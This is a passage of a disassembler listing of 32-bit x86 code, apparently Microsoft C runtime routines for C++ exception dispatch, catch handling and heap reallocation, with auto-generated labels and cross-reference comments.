push 1
add eax, 0FFFFFFF0h
push [ebp+arg_1C]
push [ebp+arg_18]
push esi
push 0
push eax
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_431699
add esp, 2Ch
loc_43157C: ; CODE XREF: sub_4314DE+59�j
; sub_4314DE+5E�j ...
inc [ebp+var_4]
add esi, 14h
jmp short loc_43152D
; ---------------------------------------------------------------------------
loc_431584: ; CODE XREF: sub_4314DE+31�j
; sub_4314DE+55�j
pop edi
pop esi
leave
retn
sub_4314DE endp
; =============== S U B R O U T I N E =======================================
sub_431588 proc near ; CODE XREF: sub_43132B+11B�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push esi
push edi
mov edi, [esp+8+arg_0]
mov eax, [edi+4]
test eax, eax
jz short loc_4315DF
cmp byte ptr [eax+8], 0
lea edx, [eax+8]
jz short loc_4315DF
mov esi, [esp+8+arg_4]
mov ecx, [esi+4]
cmp eax, ecx
jz short loc_4315B9
add ecx, 8
push ecx
push edx
call sub_42B190
pop ecx
test eax, eax
pop ecx
jnz short loc_4315DB
loc_4315B9: ; CODE XREF: sub_431588+1F�j
test byte ptr [esi], 2
jz short loc_4315C3
test byte ptr [edi], 8
jz short loc_4315DB
loc_4315C3: ; CODE XREF: sub_431588+34�j
mov eax, [esp+8+arg_8]
mov eax, [eax]
test al, 1
jz short loc_4315D2
test byte ptr [edi], 1
jz short loc_4315DB
loc_4315D2: ; CODE XREF: sub_431588+43�j
test al, 2
jz short loc_4315DF
test byte ptr [edi], 2
jnz short loc_4315DF
loc_4315DB: ; CODE XREF: sub_431588+2F�j
; sub_431588+39�j ...
xor eax, eax
jmp short loc_4315E2
; ---------------------------------------------------------------------------
loc_4315DF: ; CODE XREF: sub_431588+B�j
; sub_431588+14�j ...
push 1
pop eax
loc_4315E2: ; CODE XREF: sub_431588+55�j
pop edi
pop esi
retn
sub_431588 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4315E5 proc near ; CODE XREF: sub_431290+34�p
; sub_431699+42�p
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_4376C0
push offset sub_42ACF4
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 0Ch
push ebx
push esi
push edi
mov [ebp+var_18], esp
mov ebx, [ebp+arg_0]
mov esi, [ebx+8]
mov [ebp+var_1C], esi
mov edi, [ebp+arg_8]
loc_431617: ; CODE XREF: sub_4315E5+8A�j
cmp esi, [ebp+arg_C]
jz short loc_431671
cmp esi, 0FFFFFFFFh
jle short loc_431626
cmp esi, [edi+4]
jl short loc_43162B
loc_431626: ; CODE XREF: sub_4315E5+3A�j
call sub_431B5D
loc_43162B: ; CODE XREF: sub_4315E5+3F�j
and [ebp+var_4], 0
mov eax, [edi+8]
mov eax, [eax+esi*8+4]
test eax, eax
jz short loc_431646
push 103h
push ebx
push eax
call sub_431AB0
loc_431646: ; CODE XREF: sub_4315E5+53�j
or [ebp+var_4], 0FFFFFFFFh
jmp short loc_431666
; ---------------------------------------------------------------------------
push [ebp+var_14]
call sub_431683
pop ecx
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+var_18]
or [ebp+var_4], 0FFFFFFFFh
mov edi, [ebp+arg_8]
mov ebx, [ebp+arg_0]
mov esi, [ebp+var_1C]
loc_431666: ; CODE XREF: sub_4315E5+65�j
mov eax, [edi+8]
mov esi, [eax+esi*8]
mov [ebp+var_1C], esi
jmp short loc_431617
; ---------------------------------------------------------------------------
loc_431671: ; CODE XREF: sub_4315E5+35�j
mov [ebx+8], esi
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn
sub_4315E5 endp
; =============== S U B R O U T I N E =======================================
sub_431683 proc near ; CODE XREF: sub_4315E5+6A�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
mov eax, [eax]
cmp dword ptr [eax], 0E06D7363h
jz short loc_431694
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_431694: ; CODE XREF: sub_431683+C�j
jmp sub_431AFC
sub_431683 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_431699 proc near ; CODE XREF: sub_43132B+15D�p
; sub_4314DE+96�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
arg_20 = dword ptr 28h
arg_24 = dword ptr 2Ch
push ebp
mov ebp, esp
cmp [ebp+arg_18], 0
push ebx
mov ebx, [ebp+arg_14]
push esi
push edi
mov edi, [ebp+arg_4]
jz short loc_4316BB
push [ebp+arg_18]
push ebx
push edi
push [ebp+arg_0]
call sub_431859
add esp, 10h
loc_4316BB: ; CODE XREF: sub_431699+10�j
cmp [ebp+arg_24], 0
push [ebp+arg_0]
jnz short loc_4316C7
push edi
jmp short loc_4316CA
; ---------------------------------------------------------------------------
loc_4316C7: ; CODE XREF: sub_431699+29�j
push [ebp+arg_24]
loc_4316CA: ; CODE XREF: sub_431699+2C�j
call sub_42B457
mov esi, [ebp+arg_1C]
push dword ptr [esi]
push [ebp+arg_10]
push [ebp+arg_C]
push edi
call sub_4315E5
mov eax, [esi+4]
push 100h
push [ebp+arg_20]
inc eax
mov [edi+8], eax
push dword ptr [ebx+0Ch]
push [ebp+arg_10]
push [ebp+arg_8]
push edi
push [ebp+arg_0]
call sub_431714
add esp, 2Ch
test eax, eax
jz short loc_43170F
push edi
push eax
call sub_42B415
loc_43170F: ; CODE XREF: sub_431699+6D�j
pop edi
pop esi
pop ebx
pop ebp
retn
sub_431699 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_431714 proc near ; CODE XREF: sub_431699+63�p
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_4376D0
push offset sub_42ACF4
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 1Ch
push ebx
push esi
push edi
mov [ebp+var_18], esp
mov ebx, [ebp+arg_10]
mov [ebp+var_2C], ebx
and [ebp+var_24], 0
mov esi, [ebp+arg_4]
mov eax, [esi-4]
mov [ebp+var_28], eax
call sub_42E41E
mov eax, [eax+6Ch]
mov [ebp+var_1C], eax
call sub_42E41E
mov eax, [eax+70h]
mov [ebp+var_20], eax
call sub_42E41E
mov edi, [ebp+arg_0]
mov [eax+6Ch], edi
call sub_42E41E
mov ecx, [ebp+arg_8]
mov [eax+70h], ecx
and [ebp+var_4], 0
mov [ebp+var_4], 1
push [ebp+arg_18]
push [ebp+arg_14]
push ebx
push [ebp+arg_C]
push esi
call sub_42B4DC
add esp, 14h
mov [ebp+var_2C], eax
and [ebp+var_4], 0
or [ebp+var_4], 0FFFFFFFFh
call sub_4317E1
mov eax, [ebp+var_2C]
loc_4317AA: ; CODE XREF: .text:004317D9�j
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn
sub_431714 endp
; =============== S U B R O U T I N E =======================================
sub_4317B9 proc near ; DATA XREF: .text:004376E0�o
push dword ptr [ebp-14h]
call sub_43182F
pop ecx
retn
sub_4317B9 endp
; ---------------------------------------------------------------------------
mov esp, [ebp-18h]
and dword ptr [ebp-2Ch], 0
push 0FFFFFFFFh
lea eax, [ebp-10h]
push eax
call sub_42AC3E
pop ecx
pop ecx
xor eax, eax
jmp short loc_4317AA
; ---------------------------------------------------------------------------
loc_4317DB: ; DATA XREF: .text:004376D8�o
mov esi, [ebp+0Ch]
mov edi, [ebp+8]
; =============== S U B R O U T I N E =======================================
sub_4317E1 proc near ; CODE XREF: sub_431714+8E�p
mov eax, [ebp-28h]
mov [esi-4], eax
call sub_42E41E
mov ecx, [ebp-1Ch]
mov [eax+6Ch], ecx
call sub_42E41E
mov ecx, [ebp-20h]
mov [eax+70h], ecx
cmp dword ptr [edi], 0E06D7363h
jnz short locret_43182E
cmp dword ptr [edi+10h], 3
jnz short locret_43182E
cmp dword ptr [edi+14h], 19930520h
jnz short locret_43182E
cmp dword ptr [ebp-24h], 0
jnz short locret_43182E
cmp dword ptr [ebp-2Ch], 0
jz short locret_43182E
call sub_42ACA6
push eax
push edi
call sub_431A1D
pop ecx
pop ecx
locret_43182E: ; CODE XREF: sub_4317E1+22�j
; sub_4317E1+28�j ...
retn
sub_4317E1 endp
; =============== S U B R O U T I N E =======================================
sub_43182F proc near ; CODE XREF: sub_4317B9+3�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
mov eax, [eax]
cmp dword ptr [eax], 0E06D7363h
jnz short loc_431856
cmp dword ptr [eax+10h], 3
jnz short loc_431856
cmp dword ptr [eax+14h], 19930520h
jnz short loc_431856
cmp dword ptr [eax+1Ch], 0
jnz short loc_431856
push 1
pop eax
retn
; ---------------------------------------------------------------------------
loc_431856: ; CODE XREF: sub_43182F+C�j
; sub_43182F+12�j ...
xor eax, eax
retn
sub_43182F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_431859 proc near ; CODE XREF: sub_431699+1A�p
var_18 = dword ptr -18h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_4376E8
push offset sub_42ACF4
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 0Ch
push ebx
push esi
push edi
mov [ebp+var_18], esp
mov ecx, [ebp+arg_8]
mov eax, [ecx+4]
test eax, eax
jz loc_431A02
cmp byte ptr [eax+8], 0
jz loc_431A02
mov eax, [ecx+8]
test eax, eax
jz loc_431A02
mov edx, [ebp+arg_4]
lea edi, [eax+edx+0Ch]
and [ebp+var_4], 0
test byte ptr [ecx], 8
jz short loc_4318F6
mov esi, [ebp+arg_0]
push 1
push dword ptr [esi+18h]
call sub_434BF7
pop ecx
pop ecx
test eax, eax
jz loc_4319F9
push 1
push edi
call sub_434C13
pop ecx
pop ecx
test eax, eax
jz loc_4319F9
mov eax, [esi+18h]
mov [edi], eax
mov ecx, [ebp+arg_C]
add ecx, 8
push ecx
loc_4318E7: ; CODE XREF: sub_431859+F5�j
push eax
call sub_431A84
pop ecx
pop ecx
mov [edi], eax
jmp loc_4319FE
; ---------------------------------------------------------------------------
loc_4318F6: ; CODE XREF: sub_431859+57�j
mov esi, [ebp+arg_C]
test byte ptr [esi], 1
jz short loc_431950
mov ebx, [ebp+arg_0]
push 1
push dword ptr [ebx+18h]
call sub_434BF7
pop ecx
pop ecx
test eax, eax
jz loc_4319F9
push 1
push edi
call sub_434C13
pop ecx
pop ecx
test eax, eax
jz loc_4319F9
push dword ptr [esi+14h]
push dword ptr [ebx+18h]
push edi
call sub_42B9C0
add esp, 0Ch
cmp dword ptr [esi+14h], 4
jnz loc_4319FE
mov eax, [edi]
test eax, eax
jz loc_4319FE
add esi, 8
push esi
jmp short loc_4318E7
; ---------------------------------------------------------------------------
loc_431950: ; CODE XREF: sub_431859+A3�j
cmp dword ptr [esi+18h], 0
mov ebx, [ebp+arg_0]
push 1
push dword ptr [ebx+18h]
jnz short loc_431998
call sub_434BF7
pop ecx
pop ecx
test eax, eax
jz loc_4319F9
push 1
push edi
call sub_434C13
pop ecx
pop ecx
test eax, eax
jz short loc_4319F9
push dword ptr [esi+14h]
add esi, 8
push esi
push dword ptr [ebx+18h]
call sub_431A84
pop ecx
pop ecx
push eax
push edi
call sub_42B9C0
add esp, 0Ch
jmp short loc_4319FE
; ---------------------------------------------------------------------------
loc_431998: ; CODE XREF: sub_431859+103�j
call sub_434BF7
pop ecx
pop ecx
test eax, eax
jz short loc_4319F9
push 1
push edi
call sub_434C13
pop ecx
pop ecx
test eax, eax
jz short loc_4319F9
push dword ptr [esi+18h]
call sub_434C2F
pop ecx
test eax, eax
jz short loc_4319F9
test byte ptr [esi], 4
jz short loc_4319DF
push 1
lea eax, [esi+8]
push eax
push dword ptr [ebx+18h]
call sub_431A84
pop ecx
pop ecx
push eax
push dword ptr [esi+18h]
push edi
call sub_42B450
jmp short loc_4319FE
; ---------------------------------------------------------------------------
loc_4319DF: ; CODE XREF: sub_431859+168�j
lea eax, [esi+8]
push eax
push dword ptr [ebx+18h]
call sub_431A84
pop ecx
pop ecx
push eax
push dword ptr [esi+18h]
push edi
call sub_42B449
jmp short loc_4319FE
; ---------------------------------------------------------------------------
loc_4319F9: ; CODE XREF: sub_431859+6A�j
; sub_431859+7C�j ...
call sub_431B5D
loc_4319FE: ; CODE XREF: sub_431859+98�j
; sub_431859+E1�j ...
or [ebp+var_4], 0FFFFFFFFh
loc_431A02: ; CODE XREF: sub_431859+2E�j
; sub_431859+38�j ...
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn
sub_431859 endp
; ---------------------------------------------------------------------------
push 1
pop eax
retn
; ---------------------------------------------------------------------------
mov esp, [ebp-18h]
jmp sub_431AFC
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_431A1D proc near ; CODE XREF: sub_43132B+17C�p
; sub_4317E1+46�p
var_18 = dword ptr -18h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_4376F8
push offset sub_42ACF4
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
push ecx
push ebx
push esi
push edi
mov [ebp+var_18], esp
mov eax, [ebp+arg_0]
test eax, eax
jz short loc_431A64
mov ecx, [eax+1Ch]
mov ecx, [ecx+4]
test ecx, ecx
jz short loc_431A64
and [ebp+var_4], 0
push ecx
push dword ptr [eax+18h]
call sub_42B449
or [ebp+var_4], 0FFFFFFFFh
loc_431A64: ; CODE XREF: sub_431A1D+2A�j
; sub_431A1D+34�j
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn
sub_431A1D endp
; ---------------------------------------------------------------------------
xor eax, eax
cmp [ebp+0Ch], al
setnz al
retn
; ---------------------------------------------------------------------------
mov esp, [ebp-18h]
jmp sub_431AFC
; =============== S U B R O U T I N E =======================================
sub_431A84 proc near ; CODE XREF: sub_431859+8F�p
; sub_431859+12C�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov ecx, [esp+arg_4]
push esi
mov esi, [esp+4+arg_0]
mov eax, [ecx]
mov edx, [ecx+4]
add eax, esi
test edx, edx
jl short loc_431AA5
mov esi, [edx+esi]
mov ecx, [ecx+8]
mov ecx, [esi+ecx]
add ecx, edx
add eax, ecx
loc_431AA5: ; CODE XREF: sub_431A84+12�j
pop esi
retn
sub_431A84 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_431AB0 proc near ; CODE XREF: sub_42B4DC+40�p
; sub_4315E5+5C�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 4
push ebx
push ecx
mov eax, [ebp+arg_4]
add eax, 0Ch
mov [ebp+var_4], eax
mov eax, [ebp+arg_0]
push ebp
push [ebp+arg_8]
mov ecx, [ebp+arg_8]
mov ebp, [ebp+var_4]
call sub_42ACC9
push esi
push edi
call eax
pop edi
pop esi
mov ebx, ebp
pop ebp
mov ecx, [ebp+arg_8]
push ebp
mov ebp, ebx
cmp ecx, 100h
jnz short loc_431AEF
mov ecx, 2
loc_431AEF: ; CODE XREF: sub_431AB0+38�j
push ecx
call sub_42ACC9
pop ebp
pop ecx
pop ebx
leave
retn 0Ch
sub_431AB0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_431AFC proc near ; CODE XREF: sub_43132B:loc_4314D9�j
; sub_431683:loc_431694�j ...
var_18 = dword ptr -18h
var_4 = dword ptr -4
; FUNCTION CHUNK AT 00434C47 SIZE 00000017 BYTES
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_437708
push offset sub_42ACF4
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
push ecx
push ebx
push esi
push edi
mov [ebp+var_18], esp
xor esi, esi
mov [ebp+var_4], esi
call sub_42E41E
cmp [eax+60h], esi
jz short loc_431B4F
mov [ebp+var_4], 1
call sub_42E41E
call dword ptr [eax+60h]
mov [ebp+var_4], esi
jmp short loc_431B4F
; ---------------------------------------------------------------------------
loc_431B44: ; DATA XREF: .text:00437718�o
push 1
pop eax
retn
; ---------------------------------------------------------------------------
loc_431B48: ; DATA XREF: .text:0043771C�o
mov esp, [ebp+var_18]
and [ebp+var_4], 0
loc_431B4F: ; CODE XREF: sub_431AFC+32�j
; sub_431AFC+46�j
or [ebp+var_4], 0FFFFFFFFh
call $+5
loc_431B58: ; DATA XREF: .text:00437710�o
jmp loc_434C47
sub_431AFC endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_431B5D proc near ; CODE XREF: sub_42B680+23�p
; sub_42B680:loc_42B6EB�p ...
var_18 = dword ptr -18h
var_4 = dword ptr -4
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_437720
push offset sub_42ACF4
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
push ecx
push ebx
push esi
push edi
mov [ebp+var_18], esp
and [ebp+var_4], 0
mov eax, off_4538C0
test eax, eax
jz short loc_431BA5
mov [ebp+var_4], 1
call eax ; sub_431AFC
jmp short loc_431BA1
; ---------------------------------------------------------------------------
loc_431B9A: ; DATA XREF: .text:00437730�o
push 1
pop eax
retn
; ---------------------------------------------------------------------------
loc_431B9E: ; DATA XREF: .text:00437734�o
mov esp, [ebp+var_18]
loc_431BA1: ; CODE XREF: sub_431B5D+3B�j
and [ebp+var_4], 0
loc_431BA5: ; CODE XREF: sub_431B5D+30�j
or [ebp+var_4], 0FFFFFFFFh
call $+5
loc_431BAE: ; DATA XREF: .text:00437728�o
jmp sub_431AFC
sub_431B5D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_431BB3 proc near ; CODE XREF: sub_42B71B+39�p
; sub_435CBD+ED�p ...
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
; FUNCTION CHUNK AT 00431D47 SIZE 0000013F BYTES
; FUNCTION CHUNK AT 00431E97 SIZE 0000004B BYTES
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_437738
push offset sub_42ACF4
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 28h
push ebx
push esi
push edi
mov ebx, [ebp+arg_0]
xor edi, edi
cmp ebx, edi
jnz short loc_431BED
push [ebp+arg_4]
call sub_4296E8
pop ecx
jmp loc_431ED3
; ---------------------------------------------------------------------------
loc_431BED: ; CODE XREF: sub_431BB3+2A�j
mov esi, [ebp+arg_4]
cmp esi, edi
jnz short loc_431C00
push ebx
call sub_429822
pop ecx
jmp loc_431ED1
; ---------------------------------------------------------------------------
loc_431C00: ; CODE XREF: sub_431BB3+3F�j
mov eax, dword_676FE4
cmp eax, 3
jnz loc_431D47
loc_431C0E: ; CODE XREF: sub_431BB3+178�j
mov [ebp+var_24], edi
cmp esi, 0FFFFFFE0h
ja loc_431D0B
push 9
call sub_42DA1F
pop ecx
mov [ebp+var_4], edi
push ebx
call sub_42C82A
pop ecx
mov [ebp+var_28], eax
cmp eax, edi
jz loc_431CDB
cmp esi, dword_676FDC
ja short loc_431C8B
push esi
push ebx
push eax
call sub_42D033
add esp, 0Ch
test eax, eax
jz short loc_431C53
mov [ebp+var_24], ebx
jmp short loc_431C8B
; ---------------------------------------------------------------------------
loc_431C53: ; CODE XREF: sub_431BB3+99�j
push esi
call sub_42CB7E
pop ecx
mov [ebp+var_24], eax
cmp eax, edi
jz short loc_431C8B
mov eax, [ebx-4]
dec eax
mov [ebp+var_20], eax
cmp eax, esi
jb short loc_431C6E
mov eax, esi
loc_431C6E: ; CODE XREF: sub_431BB3+B7�j
push eax
push ebx
push [ebp+var_24]
call sub_429350
push ebx
call sub_42C82A
mov [ebp+var_28], eax
push ebx
push eax
call sub_42C855
add esp, 18h
loc_431C8B: ; CODE XREF: sub_431BB3+8A�j
; sub_431BB3+9E�j ...
cmp [ebp+var_24], edi
jnz short loc_431CDB
cmp esi, edi
jnz short loc_431C9A
push 1
pop esi
mov [ebp+arg_4], esi
loc_431C9A: ; CODE XREF: sub_431BB3+DF�j
add esi, 0Fh
and esi, 0FFFFFFF0h
mov [ebp+arg_4], esi
push esi
push edi
push dword_676FE0
call dword_43720C ; RtlAllocateHeap
mov [ebp+var_24], eax
cmp eax, edi
jz short loc_431CDB
mov eax, [ebx-4]
dec eax
mov [ebp+var_20], eax
cmp eax, esi
jb short loc_431CC5
mov eax, esi
loc_431CC5: ; CODE XREF: sub_431BB3+10E�j
push eax
push ebx
push [ebp+var_24]
call sub_429350
push ebx
push [ebp+var_28]
call sub_42C855
add esp, 14h
loc_431CDB: ; CODE XREF: sub_431BB3+7E�j
; sub_431BB3+DB�j ...
or [ebp+var_4], 0FFFFFFFFh
call sub_431D3E
cmp [ebp+var_28], edi
jnz short loc_431D0B
cmp esi, edi
jnz short loc_431CF0
push 1
pop esi
loc_431CF0: ; CODE XREF: sub_431BB3+138�j
add esi, 0Fh
and esi, 0FFFFFFF0h
mov [ebp+arg_4], esi
push esi
push ebx
push edi
push dword_676FE0
call dword_43715C ; RtlReAllocateHeap
mov [ebp+var_24], eax
loc_431D0B: ; CODE XREF: sub_431BB3+61�j
; sub_431BB3+134�j
mov eax, [ebp+var_24]
cmp eax, edi
jnz loc_431ED3
cmp dword_676910, edi
jz loc_431ED3
push esi
call sub_42C5F5
pop ecx
test eax, eax
jnz loc_431C0E
jmp loc_431ED1
sub_431BB3 endp
; =============== S U B R O U T I N E =======================================
sub_431D36 proc near ; DATA XREF: .text:00437740�o
mov esi, [ebp+0Ch]
mov ebx, [ebp+8]
xor edi, edi
sub_431D36 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_431D3E proc near ; CODE XREF: sub_431BB3+12C�p
push 9
call sub_42DA80
pop ecx
retn
sub_431D3E endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_431BB3
loc_431D47: ; CODE XREF: sub_431BB3+55�j
cmp eax, 2
jnz loc_431E97
cmp esi, 0FFFFFFE0h
ja short loc_431D67
cmp esi, edi
jbe short loc_431D61
add esi, 0Fh
and esi, 0FFFFFFF0h
jmp short loc_431D64
; ---------------------------------------------------------------------------
loc_431D61: ; CODE XREF: sub_431BB3+1A4�j
push 10h
pop esi
loc_431D64: ; CODE XREF: sub_431BB3+1AC�j
mov [ebp+arg_4], esi
loc_431D67: ; CODE XREF: sub_431BB3+1A0�j
; sub_431BB3+2CB�j
mov [ebp+var_24], edi
cmp esi, 0FFFFFFE0h
ja loc_431E66
push 9
call sub_42DA1F
pop ecx
mov [ebp+var_4], 1
lea eax, [ebp+var_2C]
push eax
lea eax, [ebp+var_38]
push eax
push ebx
call sub_42D585
add esp, 0Ch
mov edi, eax
mov [ebp+var_30], edi
test edi, edi
jz loc_431E4A
cmp esi, dword_453154
jnb short loc_431E04
mov ebx, esi
shr ebx, 4
push ebx
push edi
push [ebp+var_2C]
push [ebp+var_38]
call sub_42D94D
add esp, 10h
test eax, eax
jz short loc_431DC9
mov eax, [ebp+arg_0]
mov [ebp+var_24], eax
jmp short loc_431E01
; ---------------------------------------------------------------------------
loc_431DC9: ; CODE XREF: sub_431BB3+20C�j
push ebx
call sub_42D621
pop ecx
mov [ebp+var_24], eax
test eax, eax
jz short loc_431E01
movzx eax, byte ptr [edi]
shl eax, 4
mov [ebp+var_34], eax
cmp eax, esi
jb short loc_431DE6
mov eax, esi
loc_431DE6: ; CODE XREF: sub_431BB3+22F�j
push eax
push [ebp+arg_0]
push [ebp+var_24]
call sub_429350
push edi
push [ebp+var_2C]
push [ebp+var_38]
call sub_42D5DC
add esp, 18h
loc_431E01: ; CODE XREF: sub_431BB3+214�j
; sub_431BB3+222�j
mov ebx, [ebp+arg_0]
loc_431E04: ; CODE XREF: sub_431BB3+1F3�j
cmp [ebp+var_24], 0
jnz short loc_431E5D
push esi
push 0
push dword_676FE0
call dword_43720C ; RtlAllocateHeap
mov [ebp+var_24], eax
test eax, eax
jz short loc_431E5D
movzx eax, byte ptr [edi]
shl eax, 4
mov [ebp+var_34], eax
cmp eax, esi
jb short loc_431E2F
mov eax, esi
loc_431E2F: ; CODE XREF: sub_431BB3+278�j
push eax
push ebx
push [ebp+var_24]
call sub_429350
push edi
push [ebp+var_2C]
push [ebp+var_38]
call sub_42D5DC
add esp, 18h
jmp short loc_431E5D
; ---------------------------------------------------------------------------
loc_431E4A: ; CODE XREF: sub_431BB3+1E7�j
push esi
push ebx
push 0
push dword_676FE0
call dword_43715C ; RtlReAllocateHeap
mov [ebp+var_24], eax
loc_431E5D: ; CODE XREF: sub_431BB3+255�j
; sub_431BB3+26B�j ...
or [ebp+var_4], 0FFFFFFFFh
call sub_431E8C
loc_431E66: ; CODE XREF: sub_431BB3+1BA�j
mov eax, [ebp+var_24]
cmp eax, edi
jnz short loc_431ED3
cmp dword_676910, edi
jz short loc_431ED3
push esi
call sub_42C5F5
pop ecx
test eax, eax
jnz loc_431D67
jmp short loc_431ED1
; END OF FUNCTION CHUNK FOR sub_431BB3
; =============== S U B R O U T I N E =======================================
sub_431E86 proc near ; DATA XREF: .text:0043774C�o
mov esi, [ebp+0Ch]
mov ebx, [ebp+8]
sub_431E86 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_431E8C proc near ; CODE XREF: sub_431BB3+2AE�p
push 9
call sub_42DA80
pop ecx
xor edi, edi
retn
sub_431E8C endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_431BB3
loc_431E97: ; CODE XREF: sub_431BB3+197�j
; sub_431BB3+31C�j
xor eax, eax
cmp esi, 0FFFFFFE0h
ja short loc_431EBA
cmp esi, edi
jnz short loc_431EA5
push 1
pop esi
loc_431EA5: ; CODE XREF: sub_431BB3+2ED�j
add esi, 0Fh
and esi, 0FFFFFFF0h
push esi
push ebx
push edi
push dword_676FE0
call dword_43715C ; RtlReAllocateHeap
loc_431EBA: ; CODE XREF: sub_431BB3+2E9�j
cmp eax, edi
jnz short loc_431ED3
cmp dword_676910, edi
jz short loc_431ED3
push esi
call sub_42C5F5
pop ecx
test eax, eax
jnz short loc_431E97
loc_431ED1: ; CODE XREF: sub_431BB3+48�j
; sub_431BB3+17E�j ...
xor eax, eax
loc_431ED3: ; CODE XREF: sub_431BB3+35�j
; sub_431BB3+15D�j ...
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn
; END OF FUNCTION CHUNK FOR sub_431BB3
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_431EE2 proc near ; CODE XREF: sub_42B71B+C�p
; sub_42B71B+2A�p
var_2C = byte ptr -2Ch
var_28 = dword ptr -28h
var_24 = byte ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
; FUNCTION CHUNK AT 00431F55 SIZE 0000006F BYTES
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_437750
push offset sub_42ACF4
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 1Ch
push ebx
push esi
push edi
mov eax, dword_676FE4
cmp eax, 3
jnz short loc_431F55
push 9
call sub_42DA1F
pop ecx
and [ebp+var_4], 0
mov esi, [ebp+arg_0]
push esi
call sub_42C82A
pop ecx
mov [ebp+var_1C], eax
test eax, eax
jz short loc_431F37
mov esi, [esi-4]
sub esi, 9
mov [ebp+var_20], esi
jmp short loc_431F3A
; ---------------------------------------------------------------------------
loc_431F37: ; CODE XREF: sub_431EE2+48�j
mov esi, [ebp+var_20]
loc_431F3A: ; CODE XREF: sub_431EE2+53�j
or [ebp+var_4], 0FFFFFFFFh
call sub_431F4C
cmp [ebp+var_1C], 0
jmp short loc_431F9E
sub_431EE2 endp
; =============== S U B R O U T I N E =======================================
sub_431F49 proc near ; DATA XREF: .text:00437758�o
mov esi, [ebp-20h]
sub_431F49 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_431F4C proc near ; CODE XREF: sub_431EE2+5C�p
push 9
call sub_42DA80
pop ecx
retn
sub_431F4C endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_431EE2
loc_431F55: ; CODE XREF: sub_431EE2+2B�j
cmp eax, 2
jnz short loc_431FA0
push 9
call sub_42DA1F
pop ecx
mov [ebp+var_4], 1
